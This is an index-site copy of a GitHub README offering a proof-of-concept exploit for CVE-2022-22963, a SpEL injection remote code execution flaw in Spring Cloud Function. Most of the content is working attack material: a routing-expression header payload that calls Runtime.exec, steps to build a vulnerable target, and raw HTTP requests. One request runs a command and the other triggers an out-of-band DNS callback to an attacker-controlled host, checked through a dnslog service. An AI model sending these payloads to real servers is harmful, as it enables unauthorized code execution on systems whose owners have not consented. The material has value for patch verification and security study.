Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/hktalent/spring-spel-0day-poc

spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963
https://github.com/hktalent/spring-spel-0day-poc

0day cve-2022-22963 exp java poc rce spel spring spring-cloud-function

Last synced: 3 months ago
JSON representation

spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963

Awesome Lists containing this project

README 

        
[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)

[![Top Langs](https://profile-counter.glitch.me/hktalent/count.svg)](https://51pwn.com)



# spring-spel-0day-poc

spring-cloud/spring-cloud-function RCE EXP POC

https://github.com/spring-cloud/spring-cloud-function

header

```

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")

```

# build

```bash

wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip

unzip v3.1.6.zip

cd spring-cloud-function-3.1.6

cd spring-cloud-function-samples/function-sample-pojo

mvn package

java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar

```

image



# get path lists for test



```bash

find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'

```

```

...

functionRouter

uppercase

lowercase

...

```



image



# poc1



```

POST /functionRouter HTTP/1.1

host:127.0.0.1:8080

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15

Connection: close

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")

Content-Length: 5



51pwn

```



image



# poc2



```

POST /functionRouter HTTP/1.1

host:127.0.0.1:8080

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15

Connection: close

spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")

Content-Length: 5



51pwn

```



## check



```bash

curl -v -H "user-agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'

```



# Donation

| Wechat Pay | AliPay | Paypal | BTC Pay |BCH Pay |

| --- | --- | --- | --- | --- |

|||[paypal](https://www.paypal.me/pwned2019) **[email protected]**|||